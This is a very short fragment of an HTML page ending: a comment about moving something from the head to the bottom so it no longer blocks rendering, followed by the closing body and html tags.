<!-- Migrate from head to bottom, no longer block render and still work -->

</body>

</html>
